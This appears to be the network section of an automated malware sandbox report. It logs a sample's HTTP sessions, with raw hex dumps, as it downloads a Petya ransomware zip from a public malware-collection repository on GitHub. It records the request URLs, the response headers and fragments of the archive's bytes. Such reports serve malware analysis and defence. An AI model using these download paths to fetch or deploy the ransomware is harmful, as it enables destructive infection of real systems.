                                                                                                                                                            2022-09-29 12:44:54 UTC1983INData Raw: d7 43 2f 1b fb 48 78 ad 50 2a 21 c1 28 88 d9 f2 c7 f8 5e 1e d5 bc 8c 93 53 f9 40 71 30 ff 87 1b 4f ef c6 88 f9 19 db f9 a3 f4 3b ee cb 75 75 08 fe df 83 73 22 7c d4 77 c6 14 f4 72 ed 58 f8 8e eb a2 e9 cd 3e 24 64 a0 32 92 be ed b1 1f 07 19 94 6e c6 63 96 d1 11 5c 79 28 93 46 02 b9 4f ee 04 89 8b 19 1c 40 0b f0 94 a0 99 11 49 83 30 55 f5 ca 6a be 04 ea a5 15 51 9c da d2 8a 22 c5 90 31 01 6d 05 f4 d2 8c e3 e5 4e bb 49 1a 4b 3e 1e 61 d5 f8 ab 5e e6 b1 f3 67 b4 4e cc d8 99 96 a5 fa 04 1c 34 36 df d9 2d c0 ad e2 e7 80 12 a2 f3 b2 4f a2 bd 0c cf dc 64 94 42 fa 57 fd 0b 77 68 65 a6 d6 dd 18 65 4f 4b 7f bc 66 c6 e0 b4 8c bd f7 1b 43 1e 0d 5d ac 55 70 35 50 99 f5 c5 c1 6d c8 ca 97 14 c9 c7 37 87 b2 40 d0 fe 4e d3 23 73 f8 cb 97 cf 50 37 f6 e2 59 9c 3e ef 1a 87 65
                                                                                                                                                            Data Ascii: C/HxP*!(^S@q0O;uus"|wrX>$d2nc\y(FO@I0UjQ"1mNIK>a^gN46-OdBWwheeOKfC]Up5Pm7@N#sP7Y>e
                                                                                                                                                            2022-09-29 12:44:54 UTC1999INData Raw: b4 14 a3 34 08 21 f0 c9 08 54 6b ee f9 62 0c f0 c5 f5 48 c6 1f dd 53 ea 2e fb e8 dc 93 15 3f dd 5a 05 6e 79 cc 52 ed d7 35 4e f1 6e 31 a1 49 44 1b 11 60 a3 1d 71 0c da c9 6b 46 f6 71 0a 3f 6c f6 90 8a e4 55 5f d1 42 75 a4 90 be 20 e2 5f 95 68 5f 69 63 e7 3d 9f c1 4b 61 16 6c f0 1a 0f f8 64 ca ee 56 26 bd c4 73 12 3c ff 8a 11 ee 07 d9 ca f0 c3 05 a4 b7 38 9d 96 1f d1 79 5d 52 0f 03 7e e0 35 d8 74 40 6b 0c fd 46 56 fd 04 15 06 d6 40 9c 47 4f 47 f8 c7 9a 8f 7c 87 8a 86 f5 c9 31 f2 10 d4 ef 8a 50 5d d5 4e 3b 81 d5 2b b8 d4 9f d4 75 09 de 1a 2c a7 bf 33 db a4 2d b5 98 40 12 11 78 06 1c 7e ae 61 ba 66 95 69 aa a7 4d ac 2b d0 87 c6 90 d3 d8 16 8f 9b 03 01 d9 0a ba 5b 84 51 53 25 b4 50 52 8d f5 45 7d 4c cc 44 26 eb 5e 53 96 43 cd 2e 11 e2 dd b8 f5 a6 7e 55 0c 18
                                                                                                                                                            Data Ascii: 4!TkbHS.?ZnyR5Nn1ID`qkFq?lU_Bu _h_ic=KaldV&s<8y]R~5t@kFV@GOG|1P]N;+u,3-@x~afiM+[QS%PRE}LD&^SC.~U
                                                                                                                                                            2022-09-29 12:44:54 UTC2015INData Raw: 24 61 96 b0 8d fb ff bd a2 6b 00 82 c3 b7 7f 16 a4 a1 0e 83 b5 ab 88 b8 91 5f ac 37 99 fd a6 9f 46 64 8b 18 c9 78 b7 92 80 2f 16 37 fd f5 00 d4 94 96 c3 cf 61 b6 ec ab ba 51 da 33 3f ae f6 86 33 41 0a aa 0f 6b 87 0f 0a 54 49 17 e6 13 df 0b 9f ad 20 22 3f cf d0 15 7b 1a ba 95 dc 14 0c f2 cf d5 33 f7 2f 97 2f 0c 4e 20 56 20 a2 27 4a bf ca a3 7a e1 ae ed 45 ab 84 43 4b 32 04 6b 2e fc 9a 58 76 6b 17 42 ce 22 91 13 b2 52 c1 74 ed be f8 29 73 95 79 54 a5 35 38 f3 63 53 16 11 d6 99 f4 12 39 4e bf 51 ad a6 f6 03 ee 4a f9 5f 29 71 59 39 ef 1c 5f f7 0a 03 c1 17 cc 47 ea 4f 55 fd bb e0 e5 07 33 53 ca 58 b6 6e f3 97 ea 95 eb 3b cc 7f 08 01 56 07 51 f6 7a cd 6f 14 ff e5 9a eb 52 f4 0e 2c 28 fe 2c 5a ce 58 2e 8a 34 3b 2d 84 8a 5b 4d d0 06 fd 69 72 49 2f ba e9 00 6b eb
                                                                                                                                                            Data Ascii: $ak_7Fdx/7aQ3?3AkTI "?{3//N V 'JzECK2k.XvkB"Rt)syT58cS9NQJ_)qY9_GOU3SXn;VQzoR,(,ZX.4;-[MirI/k
                                                                                                                                                            2022-09-29 12:44:54 UTC2031INData Raw: 4a 57 d3 ff 58 61 ec 47 29 f7 df 14 26 8d 83 f3 36 84 e3 6e 15 75 9b 28 c2 b4 64 aa 5d d0 b3 cf 2d af 8a 72 f0 c9 2e a6 96 d4 2c 1d 25 6e e2 4e d4 0d ed 9c 5b 79 25 98 77 00 cd 79 f7 9d 53 53 49 b5 4d 01 27 80 36 08 c4 2c 1e bd 07 f5 29 c7 62 73 3a 84 b8 6e 66 cc 8d 74 09 17 d7 97 8a 5b da aa c1 16 65 4f b1 60 ff cd d7 a3 2d e4 94 7d c2 4c 9d d9 f3 66 d5 fd 07 71 2a fa 58 2d dc 7f 93 de 27 e3 06 c0 26 08 a2 7e 35 64 6d a5 10 36 99 b4 66 29 48 f9 0b 9d a7 8c 65 ee b7 34 55 a5 d6 9f 45 1c 82 12 bd f1 15 e5 1c ed 4e bf 86 4b 0a df 59 ef 7b 9f c4 39 f1 7a f4 09 cc 7f e4 c1 f0 40 c1 36 22 33 69 01 93 7a 58 fb 02 93 86 e6 aa eb b5 a5 30 66 08 57 46 de 67 22 be 75 cb 04 fa 1e 24 06 be 1b 0a 50 82 dd c2 fc 9e 45 19 7a d1 d0 2d dc ab b0 f7 fb 32 3b 70 b2 2c 7b 68
                                                                                                                                                            Data Ascii: JWXaG)&6nu(d]-r.,%nN[y%wySSIM'6,)bs:nft[eO`-}Lfq*X-'&~5dm6f)He4UENKY{9z@6"3izX0fWFg"u$PEz-2;p,{h
                                                                                                                                                            2022-09-29 12:44:54 UTC2047INData Raw: 1d f3 02 f3 b4 b7 ba 25 b5 44 11 7c d7 05 83 62 8c 25 cd f0 b4 9b 9a a7 bd b6 ad c0 6d 67 68 20 15 1d 2d 10 b5 5e 30 51 10 e3 fa ab 0b 0c 27 40 80 08 c4 5d 99 9f 90 ca 3c bf 1f 25 fd 5e e1 dd b3 7d a7 fd b0 ac ef 7b ae f2 a3 29 98 3d a5 48 28 f9 67 3a 37 35 72 29 f8 10 f0 2b da ad c5 15 7e 74 d1 0e eb 50 fe d7 e6 aa 8c 8b 2d 19 aa 32 06 84 67 35 77 88 c4 2f ef 34 74 f2 04 14 4f 9b 70 d0 00 f2 e8 51 cc f3 16 83 3a a1 81 49 05 cc e8 f9 ef 13 ac c5 46 46 46 3c 10 4d a0 75 a4 af d1 61 e3 81 d7 28 e8 a5 58 8b bd 7e 24 a8 95 d1 fd d6 40 01 45 9f aa a7 fb 67 e3 14 09 4d c7 65 50 e7 df 6d 0e 7e bd 70 87 70 c0 52 7e aa 5f 7e 94 23 f4 d7 7b d5 bb 52 c5 bb 4c f0 c8 01 11 05 b2 f9 86 05 f4 3c c9 e5 01 2a 6f f6 e2 3d 6b 02 76 35 8c 77 ff 1a 2c e0 07 3d cd 8f 1d 8d 37
                                                                                                                                                            Data Ascii: %D|b%mgh -^0Q'@]<%^}{)=H(g:75r)+~tP-2g5w/4tOpQ:IFFF<Mua(X~$@EgMePm~ppR~_~#{RL<*o=kv5w,=7
                                                                                                                                                            2022-09-29 12:44:54 UTC2063INData Raw: ca fb 8d 61 57 f2 87 81 76 e6 8f 8a 11 69 f2 e7 d4 86 1f 19 13 b0 ce d7 a1 57 ac 7e f1 9f 03 e3 78 6f d6 fb a5 ae 34 df dc 04 1e 16 34 92 f9 32 4f d3 b2 db 8d 65 a0 be 82 6e 83 3d 64 6a 13 b6 4a 00 f6 38 8d a8 0c a2 ca 4a 63 23 b0 2b 08 c9 a2 a9 a6 32 5a a1 80 cb f8 99 d9 b8 7c 33 08 58 42 0b e3 2d d7 1e 34 3f 0e fb b5 bc cb 74 e8 cb f6 43 3a a5 85 34 59 8e d3 a7 0d d8 5d d5 bc 3b 80 b3 26 aa b3 dc 6d 23 95 a8 e9 bd 24 46 fa bd a3 47 03 3b e2 8b d8 55 cd a8 10 cc da aa ab 26 41 ab 7a ea fe a8 82 9b a0 6e 7a 65 6d 35 96 e0 18 3b d3 0d c2 8d 37 fc 51 fa 34 7b 93 e7 e7 0d e4 ca 4a 8f a9 fa e6 53 9b f7 cb be 74 df fd 78 00 72 ce bb 4f 51 95 3f be 44 0e f6 17 ae fb 23 c5 e4 cb 88 a3 65 5c 84 c1 45 66 92 c7 c5 54 44 d9 1e 2e 7e e3 59 86 63 e2 bd a3 a5 2c 84 3d
                                                                                                                                                            Data Ascii: aWviW~xo442Oen=djJ8Jc#+2Z|3XB-4?tC:4Y];&m#$FG;U&Aznzem5;7Q4{JStxrOQ?D#e\EfTD.~Yc,=
                                                                                                                                                            2022-09-29 12:44:54 UTC2079INData Raw: fb 7a 5c 48 2a 25 5a 30 0f fc 75 84 a4 da 31 fe a5 ee 67 5b 9f ad b0 c2 ad 07 76 dc af c7 c0 67 62 22 77 7f 51 23 c2 87 40 71 6d 65 11 ad 86 1b 70 72 6c fc fe 0c c6 02 0e 12 9f a8 26 41 20 ff 5b 26 52 3f 07 32 4c c3 3d 9d 69 17 53 9b 95 8c 8e 8d ad 8c a4 7a 55 d6 a4 5d 0f 8c e6 78 1d 0c 99 da e3 70 c5 26 89 80 3a 68 f7 49 d3 96 fa 25 37 61 b9 1e 9c ee 0d ff c8 3a 98 de 6b f9 a3 ad c2 d8 9f 6e 21 5c 08 62 a9 44 f3 87 21 41 19 f9 bf 17 8e 47 80 d2 68 b4 6a ee a5 0c 3f 78 61 2e b8 5e 42 e4 0b c9 c4 d5 b9 4d f3 95 3f 9c 11 4d 2b 24 65 69 0e ba 35 53 4f 64 f1 9e a0 c6 f2 e2 74 13 d0 4e 41 2e 65 12 f2 e3 8b 4f 9f 42 b0 9b 03 93 fb ea 80 36 8d 3a 22 7c 48 c9 22 57 89 f0 3b e3 19 43 a6 d9 42 74 3c 66 88 41 e0 32 38 05 3a 55 64 46 e3 3a a5 eb 93 82 0b 99 76 4a 1c
                                                                                                                                                            Data Ascii: z\H*%Z0u1g[vgb"wQ#@qmeprl&A [&R?2L=iSzU]xp&:hI%7a:kn!\bD!AGhj?xa.^BM?M+$ei5SOdtNA.eOB6:"|H"W;CBt<fA28:UdF:vJ
                                                                                                                                                            2022-09-29 12:44:54 UTC2095INData Raw: a0 c8 a3 c4 d8 7f b1 86 e1 d0 9d 35 13 d0 1f 4d 5f 11 57 fb e1 25 d0 f2 dc 69 57 34 bc 41 ea 74 f9 ed ca c9 d5 36 8e 69 4c 97 5e 3a b8 6a b1 d7 3f 2c 42 d6 70 9e 54 42 69 06 e0 bf d9 8d ed 46 e9 2b f6 cb 38 6d c8 70 6b 69 a1 59 f2 c7 01 00 f0 f2 b1 33 e5 a9 5e 5c 6f aa bd 53 81 25 92 74 74 69 a7 cb a8 ec 39 8a 08 ee 8f e4 7d 4a 65 7c fa d7 3e 0a d2 31 fc 33 21 34 dd 23 cb e2 ed 2d b5 ec 8f 35 8b 4f e6 af cb 62 99 fb a1 c7 53 82 87 0f 17 b2 05 b5 27 fa 40 a6 c4 67 a9 3b 0d d3 79 6f 6a 2e c0 06 98 cf 90 a9 5a 3b a2 ce f3 e2 70 cb 84 9e b9 b6 49 2f 15 31 74 98 2c ba e3 57 d8 d8 99 c2 84 5e ac a0 9f 47 6a ef eb b3 51 d7 52 0a f3 02 f5 02 f4 08 f8 f2 c9 43 10 27 22 6b 90 59 39 5b 05 a0 28 cf 97 3d 7a 19 95 92 45 bf 31 ad d8 40 39 56 c9 69 49 2c da 43 4a 0f 92
                                                                                                                                                            Data Ascii: 5M_W%iW4At6iL^:j?,BpTBiF+8mpkiY3^\oS%tti9}Je|>13!4#-5ObS'@g;yoj.Z;pI/1t,W^GjQRC'"kY9[(=zE1@9ViI,CJ


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            34192.168.2.649725140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:55 UTC2101OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Petya.A.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            35140.82.121.4443192.168.2.649725C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:55 UTC2101INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:12 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Petya.A.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:44:55 UTC2101INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            36192.168.2.649726185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:55 UTC2103OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Petya.A.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            37185.199.110.133443192.168.2.649726C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:55 UTC2103INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 131293
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "db31807bd0d2739f220f59cdf06ed3d47d3bb4373e6414156d7274ec658e5f22"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 3596:11E0C:3901A7:400694:63359347
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:55 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6962-MXP
                                                                                                                                                            X-Cache: MISS
                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                            X-Timer: S1664455495.404318,VS0,VE150
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: dd7a87ea38a92f83626a226d23af31a184b8a2c9
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:49:55 GMT
                                                                                                                                                            Source-Age: 0
                                                                                                                                                            2022-09-29 12:44:55 UTC2104INData Raw: 50 4b 03 04 14 00 01 00 08 00 13 74 0f 49 e7 77 8c 48 2b 00 02 00 00 86 03 00 16 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 50 65 74 79 61 2e 41 2e 65 78 65 c5 69 3f 6d 6a b3 50 f6 03 c1 1a b8 f7 06 bc e8 4e e6 64 7c d2 a2 19 04 df 3e cc 63 7f ad 0d ab 2e 25 b6 c6 4e e4 92 f1 e3 de 02 49 83 18 f7 d9 37 7b e4 46 02 4f c1 d9 09 32 0e 77 54 3a f4 c7 82 67 94 d7 eb 64 67 0d b0 e3 80 9f 7b 94 5f 3a 03 b2 8d ed 60 1a ae e3 cf fd 4c cd b0 e9 b7 a8 f8 6a 52 b8 30 81 64 2c ae 01 f2 35 09 de 93 21 a8 1d ba de 2a 75 36 e3 0e a5 4e b8 6e 38 89 e0 52 ef 05 7b 9e 64 0a dc 0b 7c db 7b bc c0 03 b2 b3 90 ab 1b 0e 5b 9f dc bb d2 04 05 79 0b 66 e5 e5 21 c3 66 ae 41 c6 e9 c6 e8 94 83 82 0c 16 c0 97 6e 6c a7 bd ab 7d f0 b9 d5 df 40 de 8d 1b 1f 06 bc 58 c6 85 8d f0 0d 36 bb 05
                                                                                                                                                            Data Ascii: PKtIwH+Endermanch@Petya.A.exei?mjPNd|>c.%NI7{FO2wT:gdg{_:`LjR0d,5!*u6Nn8R{d|{[yf!fAnl}@X6
                                                                                                                                                            2022-09-29 12:44:55 UTC2120INData Raw: e3 03 fc 3b 3f e2 b5 58 26 d3 67 a6 ec a6 12 cf 6c 6f 02 9a d6 95 58 01 ae ce 13 2f c2 8c 59 0f 74 14 c6 2a 51 00 2e 42 eb ac b5 04 92 cb 16 ed b9 92 62 db f4 0c 49 d3 a0 79 c5 56 e9 2a 2c 3a 14 43 16 cd eb 11 82 f9 24 e4 29 80 6e 81 74 41 76 1b 0f 65 45 57 1b 51 54 a3 ca 45 c4 90 19 13 ec 1d 35 6a b2 bc ca 3f c3 64 e8 de 69 be b4 f4 4d 6d 61 d3 2a 02 9f 1a 6d 3e 82 b7 63 8f 5f 55 a5 c0 fb cb c0 97 f1 de 98 59 c5 39 d1 f9 b9 8d 1a 50 eb b0 17 33 01 b6 6b a7 4e c7 70 fb d8 d4 84 fe 36 d1 b1 6c 60 63 13 cd 0a f2 97 af 8a db 48 95 d5 8f fc 1b c7 a0 70 4b 64 2f 06 f2 f9 0f 15 97 67 c7 46 8e db 81 3c ff 9d e6 d0 2a 65 90 45 57 f9 02 75 49 f9 f6 b2 2d c1 a9 87 7c c8 9f bc 23 da fe 19 57 92 32 84 40 95 5e 59 f3 8b 2d 5b c8 c8 83 06 51 89 74 3e 77 b9 39 01 80 57
                                                                                                                                                            Data Ascii: ;?X&gloX/Yt*Q.BbIyV*,:C$)ntAveEWQTE5j?diMma*m>c_UY9P3kNp6l`cHpKd/gF<*eEWuI-|#W2@^Y-[Qt>w9W
                                                                                                                                                            2022-09-29 12:44:55 UTC2136INData Raw: f6 fa 35 99 c0 32 e3 e1 14 6d 4e 54 e7 a4 ec 0e eb 92 50 f9 59 62 f0 4e 44 b6 54 dc f6 19 c0 93 0a 46 da 99 92 df fb 84 ce 21 a9 3c 7b 16 8e 80 f6 91 38 93 7a d1 27 5f d8 85 87 84 8f 0f cf 68 b5 11 45 99 88 e1 0f 28 1a b8 23 01 78 a9 ad 5e d5 df 35 0f e1 23 f6 6a 83 4c f1 1b 93 f9 22 aa 6a ef fd 4b 07 fe 4a 8a d4 7b 06 e5 9f 6e 97 ac 25 8f 9c d5 23 55 72 e0 ac bb e1 00 a4 6c 83 d0 16 8c d2 87 e8 df ad 90 3c 9e e6 3b 3c d0 7f a1 ac 4f df f9 a1 90 54 db 0d 42 a0 84 21 2d 66 db bf 1b cb 85 6b 5c 2c 6c 27 e2 bf b6 37 f0 86 67 b2 e8 bd 56 5c 74 b0 e1 97 0d 28 e8 78 6c 54 83 1f f6 45 c6 20 56 49 06 4d f0 49 f9 86 1c e3 e4 52 98 85 69 d9 cf 2d d3 2b 2d 87 1a 76 fe 44 d2 ce cf 61 3e 18 6f 01 6b 3f 10 5e d7 46 64 6e 2e 79 ab 1f e2 b9 03 1b 45 2a 29 bf 61 19 c8 a5
                                                                                                                                                            Data Ascii: 52mNTPYbNDTF!<{8z'_hE(#x^5#jL"jKJ{n%#Url<;<OTB!-fk\,l'7gV\t(xlTE VIMIRi-+-vDa>ok?^Fdn.yE*)a
                                                                                                                                                            2022-09-29 12:44:55 UTC2152INData Raw: 45 80 44 59 83 bb 64 55 54 24 80 63 0c 30 d3 d9 80 d1 99 40 74 4d 8c aa af 46 49 b7 45 ea 0a a0 74 cb a5 88 f3 98 91 32 8f 5b a5 99 da bd 56 e0 48 d4 04 88 54 47 c0 31 f8 2d 8c ef 37 2f 22 15 95 df 18 f1 a4 69 70 8c ab fd 9c bf 13 e7 45 43 fe 7e 76 e4 27 e6 bd bb f7 cb 46 fc 34 82 b5 d8 86 8b e1 74 9f f0 56 20 21 06 b9 de 77 1c 43 d7 36 4a 61 26 e3 dc a9 19 16 de 70 a1 a2 8b 93 f6 e2 3c ed 8b ff 44 20 29 17 70 2c d1 90 79 e8 24 f5 1b 0b 39 a8 9c dc 92 fc 8c ce 99 47 f6 c8 a9 0d 34 5a 0c 53 cf 1c 5f f5 91 fd 01 1e ae fc 22 5f cc ea ac bf 6f 68 45 a9 3a 32 16 25 8f 1a ec e9 6c 97 bd 88 d1 a2 f5 a2 84 67 1e 6b be b3 d5 f2 c0 4d f2 a2 0d f1 c7 d3 9b 35 f4 45 ae a4 90 6d 0f 95 79 f2 bc e2 0c 18 f3 5c ee 8c 1a 84 a6 48 d5 4f b0 84 cd 46 97 bb a2 61 01 3c 5b 0e
                                                                                                                                                            Data Ascii: EDYdUT$c0@tMFIEt2[VHTG1-7/"ipEC~v'F4tV !wC6Ja&p<D )p,y$9G4ZS_"_ohE:2%lgkM5Emy\HOFa<[
                                                                                                                                                            2022-09-29 12:44:55 UTC2168INData Raw: c8 db ff fd e3 5d 93 6b a6 43 4e b0 97 78 3b 25 a7 15 3a 03 e3 8c 10 2c 4d dd f2 ea a5 25 c1 d4 3d e3 85 8b 41 35 0c df 06 87 a9 08 d5 6b cc 56 3c e5 14 16 5d 41 6c 22 a6 1b 77 a6 d2 c3 d6 26 05 21 77 70 9a 40 21 ff 27 a6 77 4e 46 ae f0 d7 fb 4f b8 9e f8 f3 8e 95 39 54 d3 7b 95 95 4e 1a 9f 76 02 ea 87 2a fa 56 79 23 45 e0 b2 36 d0 e9 68 24 d8 16 9f 8c 0f 14 b0 17 29 44 86 9f d2 4a fd 95 56 de e6 dc 80 2a 41 51 d4 fc d7 93 72 14 7c 02 67 72 78 ff 78 0d 44 b6 e1 00 c4 48 4f 7f 06 57 07 1c 17 fa bd 43 b8 27 2e 0f 71 1f 55 7c ba 83 75 5d b2 97 50 e4 f6 95 07 9f f2 b3 14 01 06 90 9a 20 35 d7 7b e0 7f 49 5b c6 05 7b 74 cc 64 2b 37 26 19 f0 f9 9c 1b 4b a5 a8 fb 66 16 b0 7c 27 63 0f ff 5f d9 28 9a b9 bf 71 6b 44 7c 69 c6 2e cc 82 b6 5c 69 89 1e 46 6d 71 44 3b 22
                                                                                                                                                            Data Ascii: ]kCNx;%:,M%=A5kV<]Al"w&!wp@!'wNFO9T{Nv*Vy#E6h$)DJV*AQr|grxxDHOWC'.qU|u]P 5{I[{td+7&Kf|'c_(qkD|i.\iFmqD;"
                                                                                                                                                            2022-09-29 12:44:55 UTC2184INData Raw: d7 17 95 9c 1e b8 8f b1 25 4b 59 d8 41 52 ff f4 18 4f 61 2c 75 4e 6c 69 7b 77 7b 6d 55 09 82 c6 57 e1 74 81 7e c9 9b 8f e9 b3 4c f8 f3 2d 70 22 a4 06 15 54 2b 0b 65 19 db de 48 fc a2 34 03 0c 54 a5 92 1f 8a 9c 52 95 e2 0e 3e f6 d5 5b 28 9f 86 e3 8b a1 39 1e fc 6f 18 bf 12 81 8e cf a0 95 53 2c e1 01 75 c4 1f 15 23 03 c1 a2 e5 47 1a c0 82 dc a6 b0 81 d8 f4 25 f9 b9 1e bb 5e 05 02 49 bb 97 e7 6f 2d dc 0d 6f 05 9c ed f7 82 0f 1a f1 f5 ed 68 b3 e5 39 54 89 25 c3 21 1b f6 04 ee d9 20 af 0e 77 80 9a 16 78 98 f6 1a 1c d8 d2 25 c9 d0 6e 5b a7 c9 4a 01 18 d9 e5 6f 11 ed 69 07 d0 1c a4 8a ae c1 c4 73 42 18 04 60 2f 9d 2c 0e ff 91 47 d7 28 92 8e 96 39 78 5d b2 ad d8 7e 62 36 4b 4f 6c f7 72 5d ad 7c 7c a1 76 ce 80 0a 16 1e db fd dc 9d e2 8c c5 ec 3c e3 55 24 11 2f 80
                                                                                                                                                            Data Ascii: %KYAROa,uNli{w{mUWt~L-p"T+eH4TR>[(9oS,u#G%^Io-oh9T%! wx%n[JoisB`/,G(9x]~b6KOlr]||v<U$/
                                                                                                                                                            2022-09-29 12:44:55 UTC2200INData Raw: df c1 76 f4 35 bb 04 25 57 c2 ab 00 8c e1 70 4c 84 d5 c3 45 e2 fb 55 67 38 f6 5a 09 06 3b c9 1c 17 74 72 22 a9 3d 55 9e 05 b9 11 70 d4 49 44 d8 87 53 a1 db 91 c6 c3 65 8f 8d 0f 49 8d 45 df da b2 0c 24 6a 6c db 7a c1 95 31 77 f3 25 4c 59 a3 4e d9 31 2f 04 41 ee ea b3 60 d1 34 ec e2 b8 6a 2f 9c 4e b7 fb 92 13 ba e2 b5 c4 a8 12 f9 4a 73 03 c5 c6 ed c9 c4 e7 d8 f5 0e 1c 4a b4 a0 31 ea 11 bb 05 db cd 09 fa 3a d2 02 89 e1 a7 d7 e9 d8 36 8d 6d f5 ae 4e 6c a0 e7 3c 02 64 04 4a 70 e0 34 15 d1 ed a8 9d 8a 1f 2c 54 03 a9 99 94 1c 02 ac 38 a7 49 3c 35 87 3c 6f 21 ac 28 85 a2 cb 2b ef 77 24 03 52 4d bb fe 2d 0c c1 c4 55 36 8f ab 07 4b e7 6d d9 f4 05 69 da 13 a9 a2 66 e3 f5 a0 74 91 fa 6c 26 36 2d 60 2d aa 38 9b be 4b 6d 35 10 9d 07 8b 81 ad 2f bd de 28 9e 93 33 d6 8b
                                                                                                                                                            Data Ascii: v5%WpLEUg8Z;tr"=UpIDSeIE$jlz1w%LYN1/A`4j/NJsJ1:6mNl<dJp4,T8I<5<o!(+w$RM-U6Kmiftl&6-`-8Km5/(3
                                                                                                                                                            2022-09-29 12:44:55 UTC2216INData Raw: b9 56 9d 0d 0d ca 9f 7e 8e 82 ab 25 44 e4 0c fa af 3e 0d 0e ef f6 8f ff fc be 74 b1 11 8f 1c 4f ae 93 cb 60 2d 12 f2 11 e1 dc a2 fb 29 39 4e b5 69 13 1a 7d 37 ee f6 91 7e 91 e5 af b6 13 c9 70 e3 3f bb 6b 0a 1f f2 df 0c 04 c1 4a dd 48 f8 00 29 95 91 70 e7 a6 bf 8d d8 c7 c4 84 37 d0 11 76 ba 6c df 40 bb 38 27 71 bf 85 6c 3d 01 e5 a9 3c d7 a7 55 14 99 f1 1d c8 22 5f b3 6b 75 c9 fc 1e 2c 0c 7e 31 d6 80 95 d1 dc dd 59 28 f0 cd 56 da c6 3a b8 68 21 ce c4 ae bc 3a 67 08 bf d4 58 68 d3 87 72 0c 3c 8c 28 bf fb 3b 06 ed c9 3a c0 bc 0e fc 81 06 2e c2 05 35 78 3f d2 62 cb 5c 7c 52 2f f6 11 e7 3c f6 bb 84 7a c7 06 39 ec 98 4e ee 80 04 cb 1c 63 35 4b 21 4d 7c 55 a3 77 53 e2 13 c9 14 72 6e c1 9f c4 ca c1 c7 65 4a d6 04 32 ed 9e 30 d3 8d 80 de 56 31 63 ad a0 78 4d de 34
                                                                                                                                                            Data Ascii: V~%D>tO`-)9Ni}7~p?kJH)p7vl@8'ql=<U"_ku,~1Y(V:h!:gXhr<(;:.5x?b\|R/<z9Nc5K!M|UwSrneJ20V1cxM4
